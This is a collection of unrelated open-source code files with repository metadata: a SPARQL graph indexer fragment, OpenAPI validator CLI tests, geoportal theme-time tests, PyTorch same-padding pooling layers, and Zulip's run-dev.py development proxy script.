sparql.setQuery(query)
results = sparql.query().convert()
return results
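# Hedged illustration of the update built above. The "INSERT DATA into <graph> {...}"
# form (graph named inline instead of via a GRAPH block) is the Virtuoso flavour this
# module appears to target; with identifier 'http://test-graph.org' the query looks
# roughly like
#   INSERT DATA into <http://test-graph.org> { <s1> <p1> <o1> . <s2> <p2> <o2> . ... }
# where each triple is rendered by data_formating.sparql_repr.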
def graph_exists(self):
if self.store == 'SPARQLUpdateStore':
query = 'ASK WHERE { GRAPH <%s> { ?s ?p ?o } }' % self.identifier
sparql = SPARQLWrapper(self.endpoint)
sparql.setReturnFormat(JSON)
sparql.setQuery(query)
results = sparql.query().convert()
return results['boolean']
else:
return False
def _drop_sparql(self):
query = 'DROP SILENT GRAPH <%s>' % self.identifier
sparql = SPARQLWrapper(self.endpoint)
sparql.setMethod(POST)
sparql.setReturnFormat(JSON)
sparql.setQuery(query)
results = sparql.query().convert()
# print(results)
result = results['results']['bindings'][0]['callret-0']['value']
if 'triples were removed' in result:
return True
elif 'nothing to do' in result:
return False
raise Exception('Problem Dropping the graph using: %s Message from sparql : \"%s\"' % (query, result))
if __name__ == '__main__':
# labels_indexer=Indexer(host='http://badr:8890/sparql',identifier='http://yago-encoded.org')
# labels_indexer.index_kg_from_tsv('/GW/D5data-11/gadelrab/yago2018/yagoFacts.ttl','http://yago.org/')
indexer = Indexer(endpoint='http://tracy:8890/sparql', identifier='http://test-graph.org')
print(indexer.graph_exists())
indexer.index_triples(
FileTriplesSource('/home/gadelrab/ExDEC/data/20k_kemans_it1.nt', prefix='http://test.org/', safe_urls=True),
drop_old=True)
c = 0
for t in indexer.graph.triples((None, None, None)):
c += 1
print(c)
print(indexer.graph_exists())
# print(labels_indexer.drop())
| 36.049296
| 116
| 0.635866
|
979ae0c9e19d7f69b6331cf81be8c39fa371c9ce
| 3,050
|
py
|
Python
|
tests/integration/test_main.py
|
RobbeSneyders/openapi-spec-validator
|
04f30172e1e6bb03b77a154fc95e1283495ea8ed
|
[
"Apache-2.0"
] | null | null | null |
tests/integration/test_main.py
|
RobbeSneyders/openapi-spec-validator
|
04f30172e1e6bb03b77a154fc95e1283495ea8ed
|
[
"Apache-2.0"
] | null | null | null |
tests/integration/test_main.py
|
RobbeSneyders/openapi-spec-validator
|
04f30172e1e6bb03b77a154fc95e1283495ea8ed
|
[
"Apache-2.0"
] | null | null | null |
import pytest
from io import StringIO
from openapi_spec_validator.__main__ import main
from unittest import mock
def test_schema_default():
"""Test default schema is 3.0.0"""
testargs = ['./tests/integration/data/v3.0/petstore.yaml']
main(testargs)
def test_schema_v3():
"""No errors when calling proper v3 file."""
testargs = ['--schema', '3.0.0',
'./tests/integration/data/v3.0/petstore.yaml']
main(testargs)
def test_schema_v2():
"""No errors when calling with proper v2 file."""
testargs = ['--schema', '2.0',
'./tests/integration/data/v2.0/petstore.yaml']
main(testargs)
def test_errors_on_missing_description_best(capsys):
"""An error is obviously printed given an empty schema."""
testargs = ['./tests/integration/data/v3.0/missing-description.yaml']
with pytest.raises(SystemExit):
main(testargs)
out, err = capsys.readouterr()
assert "Failed validating" in out
assert "'description' is a required property" in out
assert "'$ref' is a required property" not in out
assert '1 more subschemas errors' in out
def test_errors_on_missing_description_full(capsys):
"""An error is obviously printed given an empty schema."""
testargs = [
"./tests/integration/data/v3.0/missing-description.yaml",
"--errors=all"
]
with pytest.raises(SystemExit):
main(testargs)
out, err = capsys.readouterr()
assert "Failed validating" in out
assert "'description' is a required property" in out
assert "'$ref' is a required property" in out
assert '1 more subschema error' not in out
def test_schema_unknown():
"""Errors on running with unknown schema."""
testargs = ['--schema', 'x.x',
'./tests/integration/data/v2.0/petstore.yaml']
with pytest.raises(SystemExit):
main(testargs)
def test_validation_error():
"""SystemExit on running with ValidationError."""
testargs = ['--schema', '3.0.0',
'./tests/integration/data/v2.0/petstore.yaml']
with pytest.raises(SystemExit):
main(testargs)
@mock.patch(
'openapi_spec_validator.__main__.openapi_v3_spec_validator.validate',
side_effect=Exception,
)
def test_unknown_error(m_validate):
"""SystemExit on running with unknown error."""
testargs = ['--schema', '3.0.0',
'./tests/integration/data/v2.0/petstore.yaml']
with pytest.raises(SystemExit):
main(testargs)
def test_nonexisting_file():
"""Calling with non-existing file should sys.exit."""
testargs = ['i_dont_exist.yaml']
with pytest.raises(SystemExit):
main(testargs)
def test_schema_stdin():
"""Test schema from STDIN"""
spes_path = './tests/integration/data/v3.0/petstore.yaml'
with open(spes_path, 'r') as spec_file:
spec_lines = spec_file.readlines()
spec_io = StringIO("".join(spec_lines))
testargs = ['-']
with mock.patch('openapi_spec_validator.__main__.sys.stdin', spec_io):
main(testargs)
| 30.19802
| 74
| 0.664262
|
4bf5b9c072ffae1ef2a97fc649387cc1e024449b
| 15,782
|
py
|
Python
|
geoportal/tests/functional/test_themes_time.py
|
rbovard/c2cgeoportal
|
61b7a4fc98f686f9b7d4c5fda7bb4c5cc09f8de8
|
[
"BSD-2-Clause-FreeBSD"
] | 43
|
2015-02-16T06:56:25.000Z
|
2021-09-12T17:49:16.000Z
|
geoportal/tests/functional/test_themes_time.py
|
rbovard/c2cgeoportal
|
61b7a4fc98f686f9b7d4c5fda7bb4c5cc09f8de8
|
[
"BSD-2-Clause-FreeBSD"
] | 3,227
|
2015-01-05T10:30:59.000Z
|
2022-03-31T03:25:39.000Z
|
geoportal/tests/functional/test_themes_time.py
|
rbovard/c2cgeoportal
|
61b7a4fc98f686f9b7d4c5fda7bb4c5cc09f8de8
|
[
"BSD-2-Clause-FreeBSD"
] | 57
|
2015-01-29T08:32:12.000Z
|
2022-03-16T07:07:33.000Z
|
# Copyright (c) 2013-2019, Camptocamp SA
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# The views and conclusions contained in the software and documentation are those
# of the authors and should not be interpreted as representing official policies,
# either expressed or implied, of the FreeBSD Project.
# pylint: disable=missing-docstring,attribute-defined-outside-init,protected-access
import re
import typing
from unittest import TestCase
import sqlalchemy.ext.declarative
import transaction
from geoalchemy2 import Geometry
from pyramid import testing
from sqlalchemy import Column
from sqlalchemy.types import DateTime, Integer, Unicode
from tests.functional import create_default_ogcserver, create_dummy_request, mapserv_url
from tests.functional import setup_common as setup_module # noqa
from tests.functional import teardown_common as teardown_module # noqa
Base: typing.Any = sqlalchemy.ext.declarative.declarative_base()
class PointTest(Base): # type: ignore
__tablename__ = "testpointtime"
__table_args__ = {"schema": "geodata"}
id = Column(Integer, primary_key=True)
geom = Column(Geometry("POINT", srid=21781))
name = Column(Unicode)
time = Column(DateTime)
class TestThemesTimeView(TestCase):
def setup_method(self, _):
# Always see the diff
# https://docs.python.org/2/library/unittest.html#unittest.TestCase.maxDiff
self.maxDiff = None
from c2cgeoportal_commons.models import DBSession
from c2cgeoportal_commons.models.main import Interface, LayerGroup, LayerWMS, LayerWMTS, Theme
DBSession.query(PointTest).delete()
main = Interface(name="desktop")
ogc_server = create_default_ogcserver()
layer_wms_1 = LayerWMS(name="__test_layer_time_1", public=True)
layer_wms_1.layer = "test_wmstime"
layer_wms_1.time_mode = "value"
layer_wms_1.interfaces = [main]
layer_wms_1.ogc_server = ogc_server
layer_wms_2 = LayerWMS(name="__test_layer_time_2", public=True)
layer_wms_2.layer = "test_wmstime2"
layer_wms_2.time_mode = "value"
layer_wms_2.interfaces = [main]
layer_wms_2.ogc_server = ogc_server
layer_wmts = LayerWMTS(name="__test_layer_wmts", public=True)
layer_wmts.url = "http://example.com/1.0.0/WMTSCapabilities.xml"
layer_wmts.layer = "map"
layer_wmts.interfaces = [main]
layer_wms_group_1 = LayerWMS(name="__test_layer_time_group_1", public=True)
layer_wms_group_1.layer = "test_wmstimegroup"
layer_wms_group_1.time_mode = "range"
layer_wms_group_1.time_widget = "datepicker"
layer_wms_group_1.interfaces = [main]
layer_wms_group_1.ogc_server = ogc_server
layer_wms_group_2 = LayerWMS(name="__test_layer_time_group_2", public=True)
layer_wms_group_2.layer = "test_wmstimegroup"
layer_wms_group_2.time_mode = "value"
layer_wms_group_2.interfaces = [main]
layer_wms_group_2.ogc_server = ogc_server
layer_wms_no_time = LayerWMS(name="__test_layer_without_time_info", public=True)
layer_wms_no_time.layer = "test_wmsfeatures"
layer_wms_no_time.time_mode = "value"
layer_wms_no_time.interfaces = [main]
layer_wms_no_time.ogc_server = ogc_server
# Expect merge of times
layer_group_1 = LayerGroup(name="__test_layer_group_1")
layer_group_1.children = [layer_wms_1, layer_wms_2]
# Expect time from layer.
layer_group_2 = LayerGroup(name="__test_layer_group_2")
layer_group_2.children = [layer_wms_1]
# Expect merge of wms 1 and 2; layer_wms_group_1 is excluded and reported in errors because its time mode doesn't match.
layer_group_3 = LayerGroup(name="__test_layer_group_3")
layer_group_3.children = [layer_wms_1, layer_wms_2, layer_wms_group_1]
# Expect time from layers in wms layer group
layer_group_4 = LayerGroup(name="__test_layer_group_4")
layer_group_4.children = [layer_wms_group_1]
# Expect merge of wms 1 and 2 and group.
layer_group_5 = LayerGroup(name="__test_layer_group_5")
layer_group_5.children = [layer_wms_1, layer_wms_2, layer_wms_group_2]
# Expect individual layers
layer_group_6 = LayerGroup(name="__test_layer_group_6")
layer_group_6.children = [layer_wms_1, layer_wms_2, layer_wmts]
# Expect layer_wms_no_time excluded and in errors as it has no time info
layer_group_7 = LayerGroup(name="__test_layer_group_7")
layer_group_7.children = [layer_wms_1, layer_wms_no_time]
theme = Theme(name="__test_theme")
theme.interfaces = [main]
theme.children = [
layer_group_1,
layer_group_2,
layer_group_3,
layer_group_4,
layer_group_5,
layer_group_6,
layer_group_7,
]
DBSession.add_all([theme])
transaction.commit()
def teardown_method(self, _):
testing.tearDown()
from c2cgeoportal_commons.models import DBSession
from c2cgeoportal_commons.models.main import Interface, OGCServer, TreeItem
for item in DBSession.query(TreeItem).all():
DBSession.delete(item)
DBSession.query(Interface).filter(Interface.name == "main").delete()
DBSession.query(OGCServer).delete()
transaction.commit()
DBSession.query(PointTest).delete()
@staticmethod
def _create_request_obj(params=None, **kwargs):
if params is None:
params = {}
request = create_dummy_request(**kwargs)
request.route_url = lambda url, **kwargs: mapserv_url
request.params = params
return request
def _create_theme_obj(self, **kwargs):
from c2cgeoportal_geoportal.views.theme import Theme
return Theme(self._create_request_obj(**kwargs))
def _only(self, item, attributes=None):
if attributes is None:
attributes = ["name", "time"]
result = {}
for attribute in attributes:
if attribute in item:
result[attribute] = item[attribute]
if "children" in item:
result["children"] = [self._only(i, attributes) for i in item["children"]]
return result
@staticmethod
def _get_filtered_errors(themes):
errors = themes["errors"]
regex = re.compile(
r"The (GeoMapFish|WMS) layer name '[a-z0-9_.]*', cannot be two times in the same block \(first level group\)."
)
errors = [e for e in errors if not regex.match(e)]
return set(errors)
def test_time(self):
theme_view = self._create_theme_obj()
themes = theme_view.themes()
self.assertEqual(
set(themes["errors"]),
{
"Error while handling time for layer '__test_layer_time_group_1': Could not mix time mode 'range' and 'value'",
"Error: time layer '__test_layer_without_time_info' has no time information in capabilities",
},
)
self.assertEqual(
[self._only(t) for t in themes["themes"]],
[
{
"name": "__test_theme",
"children": [
{
"name": "__test_layer_group_1",
"time": {
"maxDefValue": None,
"interval": (1, 0, 0, 0),
"maxValue": "2020-01-01T00:00:00Z",
"minDefValue": "2000-01-01T00:00:00Z",
"minValue": "2000-01-01T00:00:00Z",
"mode": "value",
"resolution": "year",
"widget": "slider",
},
"children": [{"name": "__test_layer_time_1"}, {"name": "__test_layer_time_2"}],
},
{
"name": "__test_layer_group_2",
"children": [
{
"name": "__test_layer_time_1",
"time": {
"maxDefValue": None,
"interval": (1, 0, 0, 0),
"maxValue": "2010-01-01T00:00:00Z",
"minDefValue": "2000-01-01T00:00:00Z",
"minValue": "2000-01-01T00:00:00Z",
"mode": "value",
"resolution": "year",
"widget": "slider",
},
}
],
},
{
"name": "__test_layer_group_3",
"time": {
"maxDefValue": None,
"interval": (1, 0, 0, 0),
"maxValue": "2020-01-01T00:00:00Z",
"minDefValue": "2000-01-01T00:00:00Z",
"minValue": "2000-01-01T00:00:00Z",
"mode": "value",
"resolution": "year",
"widget": "slider",
},
"children": [
{"name": "__test_layer_time_1"},
{"name": "__test_layer_time_2"},
],
},
{
"name": "__test_layer_group_4",
"children": [
{
"name": "__test_layer_time_group_1",
"time": {
"maxDefValue": None,
"interval": (1, 0, 0, 0),
"maxValue": "2020-01-01T00:00:00Z",
"minDefValue": "2000-01-01T00:00:00Z",
"minValue": "2000-01-01T00:00:00Z",
"mode": "range",
"resolution": "year",
"widget": "datepicker",
},
}
],
},
{
"name": "__test_layer_group_5",
"time": {
"maxDefValue": None,
"interval": (1, 0, 0, 0),
"maxValue": "2020-01-01T00:00:00Z",
"minDefValue": "2000-01-01T00:00:00Z",
"minValue": "2000-01-01T00:00:00Z",
"mode": "value",
"resolution": "year",
"widget": "slider",
},
"children": [
{"name": "__test_layer_time_1"},
{"name": "__test_layer_time_2"},
{"name": "__test_layer_time_group_2"},
],
},
{
"name": "__test_layer_group_6",
"children": [
{
"name": "__test_layer_time_1",
"time": {
"maxDefValue": None,
"interval": (1, 0, 0, 0),
"maxValue": "2010-01-01T00:00:00Z",
"minDefValue": "2000-01-01T00:00:00Z",
"minValue": "2000-01-01T00:00:00Z",
"mode": "value",
"resolution": "year",
"widget": "slider",
},
},
{
"name": "__test_layer_time_2",
"time": {
"maxDefValue": None,
"interval": (1, 0, 0, 0),
"maxValue": "2020-01-01T00:00:00Z",
"minDefValue": "2015-01-01T00:00:00Z",
"minValue": "2015-01-01T00:00:00Z",
"mode": "value",
"resolution": "year",
"widget": "slider",
},
},
{"name": "__test_layer_wmts"},
],
},
{
"name": "__test_layer_group_7",
"children": [
{
"name": "__test_layer_time_1",
"time": {
"maxDefValue": None,
"interval": (1, 0, 0, 0),
"maxValue": "2010-01-01T00:00:00Z",
"minDefValue": "2000-01-01T00:00:00Z",
"minValue": "2000-01-01T00:00:00Z",
"mode": "value",
"resolution": "year",
"widget": "slider",
},
},
],
},
],
}
],
)
| 43.961003
| 127
| 0.479534
|
a63f0ab1248ff1fee17b0eb537c9e5cafac30672
| 2,942
|
py
|
Python
|
src/models/layers/pool2d_same.py
|
Alicegaz/torchok
|
7b8f95df466a25b1ad8ee93bed1a3c7516440cf4
|
[
"Apache-2.0"
] | 8
|
2021-10-12T05:39:20.000Z
|
2022-03-31T10:55:01.000Z
|
src/models/layers/pool2d_same.py
|
Alicegaz/torchok
|
7b8f95df466a25b1ad8ee93bed1a3c7516440cf4
|
[
"Apache-2.0"
] | 1
|
2022-03-30T19:23:42.000Z
|
2022-03-30T19:23:42.000Z
|
src/models/layers/pool2d_same.py
|
Alicegaz/torchok
|
7b8f95df466a25b1ad8ee93bed1a3c7516440cf4
|
[
"Apache-2.0"
] | 5
|
2021-11-17T07:38:28.000Z
|
2022-01-31T10:46:36.000Z
|
""" AvgPool2d w/ Same Padding
Hacked together by / Copyright 2020 Ross Wightman
"""
from typing import List
import torch.nn as nn
import torch.nn.functional as F
from .helpers import to_2tuple
from .padding import pad_same, get_padding_value
def avg_pool2d_same(x, kernel_size: List[int], stride: List[int], padding: List[int] = (0, 0),
ceil_mode: bool = False, count_include_pad: bool = True):
# FIXME how to deal with count_include_pad vs not for external padding?
x = pad_same(x, kernel_size, stride)
return F.avg_pool2d(x, kernel_size, stride, (0, 0), ceil_mode, count_include_pad)
class AvgPool2dSame(nn.AvgPool2d):
""" Tensorflow like 'SAME' wrapper for 2D average pooling
"""
def __init__(self, kernel_size: int, stride=None, padding=0, ceil_mode=False, count_include_pad=True):
kernel_size = to_2tuple(kernel_size)
stride = to_2tuple(stride)
super(AvgPool2dSame, self).__init__(kernel_size, stride, (0, 0), ceil_mode, count_include_pad)
def forward(self, x):
return avg_pool2d_same(
x, self.kernel_size, self.stride, self.padding, self.ceil_mode, self.count_include_pad)
def max_pool2d_same(
x, kernel_size: List[int], stride: List[int], padding: List[int] = (0, 0),
dilation: List[int] = (1, 1), ceil_mode: bool = False):
x = pad_same(x, kernel_size, stride, value=-float('inf'))
return F.max_pool2d(x, kernel_size, stride, (0, 0), dilation, ceil_mode)
class MaxPool2dSame(nn.MaxPool2d):
""" Tensorflow like 'SAME' wrapper for 2D max pooling
"""
def __init__(self, kernel_size: int, stride=None, padding=0, dilation=1, ceil_mode=False, count_include_pad=True):
kernel_size = to_2tuple(kernel_size)
stride = to_2tuple(stride)
dilation = to_2tuple(dilation)
# count_include_pad has no meaning for max pooling; pass ceil_mode by keyword so it is
# not consumed positionally as nn.MaxPool2d's return_indices argument.
super(MaxPool2dSame, self).__init__(kernel_size, stride, (0, 0), dilation, ceil_mode=ceil_mode)
def forward(self, x):
return max_pool2d_same(x, self.kernel_size, self.stride, self.padding, self.dilation, self.ceil_mode)
def create_pool2d(pool_type, kernel_size, stride=None, **kwargs):
stride = stride or kernel_size
padding = kwargs.pop('padding', '')
padding, is_dynamic = get_padding_value(padding, kernel_size, stride=stride, **kwargs)
if is_dynamic:
if pool_type == 'avg':
return AvgPool2dSame(kernel_size, stride=stride, **kwargs)
elif pool_type == 'max':
return MaxPool2dSame(kernel_size, stride=stride, **kwargs)
else:
assert False, f'Unsupported pool type {pool_type}'
else:
if pool_type == 'avg':
return nn.AvgPool2d(kernel_size, stride=stride, padding=padding, **kwargs)
elif pool_type == 'max':
return nn.MaxPool2d(kernel_size, stride=stride, padding=padding, **kwargs)
else:
assert False, f'Unsupported pool type {pool_type}'
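# Hedged usage sketch (assuming the padding helpers behave like the timm originals this
# file credits; 'torch' would need to be imported for the call below):
#   pool = create_pool2d('max', kernel_size=3, stride=2, padding='same')
#   y = pool(torch.randn(1, 8, 32, 32))   # dynamic 'same' -> MaxPool2dSame, y is 1x8x16x16
# With stride 1 the 'same' padding can usually be expressed statically, and a plain
# nn.MaxPool2d / nn.AvgPool2d is returned instead.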
| 39.756757
| 118
| 0.680489
|
faf177217324f725290d60a1cefe9fc1930b55fc
| 13,048
|
py
|
Python
|
tools/run-dev.py
|
rohanj-02/zulip
|
fc0488fdb1b83bffea4a300656d7bb7f5e6ab581
|
[
"Apache-2.0"
] | 2
|
2020-11-12T12:28:46.000Z
|
2020-11-16T11:17:46.000Z
|
tools/run-dev.py
|
rohanj-02/zulip
|
fc0488fdb1b83bffea4a300656d7bb7f5e6ab581
|
[
"Apache-2.0"
] | null | null | null |
tools/run-dev.py
|
rohanj-02/zulip
|
fc0488fdb1b83bffea4a300656d7bb7f5e6ab581
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
import argparse
import os
import pwd
import signal
import subprocess
import sys
from typing import Any, Callable, Generator, List, Sequence
from urllib.parse import urlunparse
# check for the venv
from lib import sanity_check
sanity_check.check_venv(__file__)
from tornado import gen, httpclient, httputil, web
from tornado.ioloop import IOLoop
TOOLS_DIR = os.path.dirname(os.path.abspath(__file__))
sys.path.insert(0, os.path.dirname(TOOLS_DIR))
from tools.lib.test_script import assert_provisioning_status_ok
if "posix" in os.name and os.geteuid() == 0:
raise RuntimeError("run-dev.py should not be run as root.")
DESCRIPTION = """
Starts the app listening on localhost, for local development.
This script launches the Django and Tornado servers, then runs a reverse proxy
which serves to both of them. After it's all up and running, browse to
http://localhost:9991/
Note that, while runserver and runtornado have the usual auto-restarting
behavior, the reverse proxy itself does *not* automatically restart on changes
to this file.
"""
parser = argparse.ArgumentParser(
description=DESCRIPTION, formatter_class=argparse.RawTextHelpFormatter
)
parser.add_argument("--test", action="store_true", help="Use the testing database and ports")
parser.add_argument("--minify", action="store_true", help="Minifies assets for testing in dev")
parser.add_argument("--interface", help="Set the IP or hostname for the proxy to listen on")
parser.add_argument(
"--no-clear-memcached",
action="store_false",
dest="clear_memcached",
help="Do not clear memcached on startup",
)
parser.add_argument("--streamlined", action="store_true", help="Avoid thumbor, etc.")
parser.add_argument("--force", action="store_true", help="Run command despite possible problems.")
parser.add_argument(
"--enable-tornado-logging",
action="store_true",
help="Enable access logs from tornado proxy server.",
)
options = parser.parse_args()
assert_provisioning_status_ok(options.force)
if options.interface is None:
user_id = os.getuid()
user_name = pwd.getpwuid(user_id).pw_name
if user_name in ["vagrant", "zulipdev"]:
# In the Vagrant development environment, we need to listen on
# all ports, and it's safe to do so, because Vagrant is only
# exposing certain guest ports (by default just 9991) to the
# host. The same argument applies to the remote development
# servers using username "zulipdev".
options.interface = None
else:
# Otherwise, only listen to requests on localhost for security.
options.interface = "127.0.0.1"
elif options.interface == "":
options.interface = None
runserver_args: List[str] = []
base_port = 9991
if options.test:
base_port = 9981
settings_module = "zproject.test_settings"
# Don't auto-reload when running Puppeteer tests
runserver_args = ["--noreload"]
else:
settings_module = "zproject.settings"
manage_args = [f"--settings={settings_module}"]
os.environ["DJANGO_SETTINGS_MODULE"] = settings_module
sys.path.append(os.path.join(os.path.dirname(__file__), ".."))
from scripts.lib.zulip_tools import CYAN, ENDC, FAIL
proxy_port = base_port
django_port = base_port + 1
tornado_port = base_port + 2
webpack_port = base_port + 3
thumbor_port = base_port + 4
os.chdir(os.path.join(os.path.dirname(__file__), ".."))
# Clean up stale .pyc files etc.
subprocess.check_call("./tools/clean-repo")
if options.clear_memcached:
subprocess.check_call("./scripts/setup/flush-memcached")
# Set up a new process group, so that we can later kill run{server,tornado}
# and all of the processes they spawn.
os.setpgrp()
# Save pid of parent process to the pid file. It can be used later by
# tools/stop-run-dev to kill the server without having to find the
# terminal in question.
if options.test:
pid_file_path = os.path.join(os.path.join(os.getcwd(), "var/puppeteer/run_dev.pid"))
else:
pid_file_path = os.path.join(os.path.join(os.getcwd(), "var/run/run_dev.pid"))
# Required for compatibility with older Python versions.
if not os.path.exists(os.path.dirname(pid_file_path)):
os.makedirs(os.path.dirname(pid_file_path))
with open(pid_file_path, "w+") as f:
f.write(str(os.getpgrp()) + "\n")
def server_processes() -> List[List[str]]:
main_cmds = [
[
"./manage.py",
"rundjangoserver",
*manage_args,
*runserver_args,
f"127.0.0.1:{django_port}",
],
[
"env",
"PYTHONUNBUFFERED=1",
"./manage.py",
"runtornado",
*manage_args,
f"127.0.0.1:{tornado_port}",
],
]
if options.streamlined:
# The streamlined operation allows us to do many
# things, but search/thumbor/etc. features won't work.
return main_cmds
other_cmds = [
["./manage.py", "process_queue", "--all", *manage_args],
[
"env",
"PGHOST=127.0.0.1", # Force password authentication using .pgpass
"./puppet/zulip/files/postgresql/process_fts_updates",
"--quiet",
],
["./manage.py", "deliver_scheduled_messages"],
[
"/srv/zulip-thumbor-venv/bin/thumbor",
"--conf=./zthumbor/thumbor_settings.py",
f"--port={thumbor_port}",
],
]
# NORMAL (but slower) operation:
return main_cmds + other_cmds
def do_one_time_webpack_compile() -> None:
# We just need to compile webpack assets once at startup, not run a daemon,
# in test mode. Additionally, webpack-dev-server doesn't support running 2
# copies on the same system, so this model lets us run the Puppeteer tests
# with a running development server.
subprocess.check_call(["./tools/webpack", "--quiet", "--test"])
def start_webpack_watcher() -> "subprocess.Popen[bytes]":
webpack_cmd = ["./tools/webpack", "--watch", f"--port={webpack_port}"]
if options.minify:
webpack_cmd.append("--minify")
if options.interface is None:
# If interface is None and we're listening on all ports, we also need
# to disable the webpack host check so that webpack will serve assets.
webpack_cmd.append("--disable-host-check")
if options.interface:
webpack_cmd.append(f"--host={options.interface}")
else:
webpack_cmd.append("--host=0.0.0.0")
return subprocess.Popen(webpack_cmd)
def transform_url(protocol: str, path: str, query: str, target_port: int, target_host: str) -> str:
# generate url with target host
host = ":".join((target_host, str(target_port)))
# Here we are going to rewrite the path a bit so that it is in parity with
# what we will have for production
if path.startswith("/thumbor"):
path = path[len("/thumbor") :]
newpath = urlunparse((protocol, host, path, "", query, ""))
return newpath
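# Example (hypothetical values): with thumbor_port = 9995,
#   transform_url("http", "/thumbor/unsafe/abc.png", "v=1", 9995, "127.0.0.1")
# returns "http://127.0.0.1:9995/unsafe/abc.png?v=1" -- the "/thumbor" prefix is
# stripped so the proxied path matches what thumbor expects in production.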
@gen.engine
def fetch_request(
url: str, callback: Any, **kwargs: Any
) -> "Generator[Callable[..., Any], Any, None]":
# use large timeouts to handle polling requests
req = httpclient.HTTPRequest(
url,
connect_timeout=240.0,
request_timeout=240.0,
decompress_response=False,
**kwargs,
)
client = httpclient.AsyncHTTPClient()
# wait for response
response = yield gen.Task(client.fetch, req)
callback(response)
class BaseHandler(web.RequestHandler):
# target server ip
target_host: str = "127.0.0.1"
# target server port
target_port: int
def _add_request_headers(
self,
exclude_lower_headers_list: Sequence[str] = [],
) -> httputil.HTTPHeaders:
headers = httputil.HTTPHeaders()
for header, v in self.request.headers.get_all():
if header.lower() not in exclude_lower_headers_list:
headers.add(header, v)
return headers
def get(self) -> None:
pass
def head(self) -> None:
pass
def post(self) -> None:
pass
def put(self) -> None:
pass
def patch(self) -> None:
pass
def options(self) -> None:
pass
def delete(self) -> None:
pass
def handle_response(self, response: Any) -> None:
if response.error and not isinstance(response.error, httpclient.HTTPError):
self.set_status(500)
self.write("Internal server error:\n" + str(response.error))
else:
self.set_status(response.code, response.reason)
self._headers = httputil.HTTPHeaders() # clear tornado default header
for header, v in response.headers.get_all():
# some header appear multiple times, eg 'Set-Cookie'
self.add_header(header, v)
if response.body:
self.write(response.body)
self.finish()
@web.asynchronous
def prepare(self) -> None:
if "X-REAL-IP" not in self.request.headers:
self.request.headers["X-REAL-IP"] = self.request.remote_ip
if "X-FORWARDED_PORT" not in self.request.headers:
self.request.headers["X-FORWARDED-PORT"] = str(proxy_port)
url = transform_url(
self.request.protocol,
self.request.path,
self.request.query,
self.target_port,
self.target_host,
)
try:
fetch_request(
url=url,
callback=self.handle_response,
method=self.request.method,
headers=self._add_request_headers(["upgrade-insecure-requests"]),
follow_redirects=False,
body=getattr(self.request, "body"),
allow_nonstandard_methods=True,
)
except httpclient.HTTPError as e:
if hasattr(e, "response") and e.response:
self.handle_response(e.response)
else:
self.set_status(500)
self.write("Internal server error:\n" + str(e))
self.finish()
class WebPackHandler(BaseHandler):
target_port = webpack_port
class DjangoHandler(BaseHandler):
target_port = django_port
class TornadoHandler(BaseHandler):
target_port = tornado_port
class ThumborHandler(BaseHandler):
target_port = thumbor_port
class ErrorHandler(BaseHandler):
@web.asynchronous
def prepare(self) -> None:
print(FAIL + "Unexpected request: " + ENDC, self.request.path)
self.set_status(500)
self.write("path not supported")
self.finish()
def using_thumbor() -> bool:
return not options.streamlined
class Application(web.Application):
def __init__(self, enable_logging: bool = False) -> None:
handlers = [
(r"/json/events.*", TornadoHandler),
(r"/api/v1/events.*", TornadoHandler),
(r"/webpack.*", WebPackHandler),
(r"/thumbor.*", ThumborHandler if using_thumbor() else ErrorHandler),
(r"/.*", DjangoHandler),
]
super().__init__(handlers, enable_logging=enable_logging)
def log_request(self, handler: BaseHandler) -> None:
if self.settings["enable_logging"]:
super().log_request(handler)
def on_shutdown() -> None:
IOLoop.instance().stop()
def shutdown_handler(*args: Any, **kwargs: Any) -> None:
io_loop = IOLoop.instance()
if io_loop._callbacks:
io_loop.call_later(1, shutdown_handler)
else:
io_loop.stop()
def print_listeners() -> None:
external_host = os.getenv("EXTERNAL_HOST", f"localhost:{proxy_port}")
print(f"\nStarting Zulip on:\n\n\t{CYAN}http://{external_host}/{ENDC}\n\nInternal ports:")
ports = [
(proxy_port, "Development server proxy (connect here)"),
(django_port, "Django"),
(tornado_port, "Tornado"),
]
if not options.test:
ports.append((webpack_port, "webpack"))
if using_thumbor():
ports.append((thumbor_port, "Thumbor"))
for port, label in ports:
print(f" {port}: {label}")
print()
children = []
try:
if options.test:
do_one_time_webpack_compile()
else:
children.append(start_webpack_watcher())
for cmd in server_processes():
children.append(subprocess.Popen(cmd))
app = Application(enable_logging=options.enable_tornado_logging)
try:
app.listen(proxy_port, address=options.interface)
except OSError as e:
if e.errno == 98:
print("\n\nERROR: You probably have another server running!!!\n\n")
raise
print_listeners()
ioloop = IOLoop.instance()
for s in (signal.SIGINT, signal.SIGTERM):
signal.signal(s, shutdown_handler)
ioloop.start()
finally:
for child in children:
child.terminate()
print("Waiting for children to stop...")
for child in children:
child.wait()
# Remove pid file when development server closed correctly.
os.remove(pid_file_path)
| 30.846336
| 99
| 0.647379
|
a6f81b46c8b717bf9fb36f8c5ed31ec53aebe7c1
| 10,446
|
py
|
Python
|
workBousaiOSA_baseline/predflowio/predflowio_PCRNB.py
|
deepkashiwa20/DeepCrowd
|
847bcc20ca36b521eead4ededa5d11b2fd2af30a
|
[
"MIT"
] | 4
|
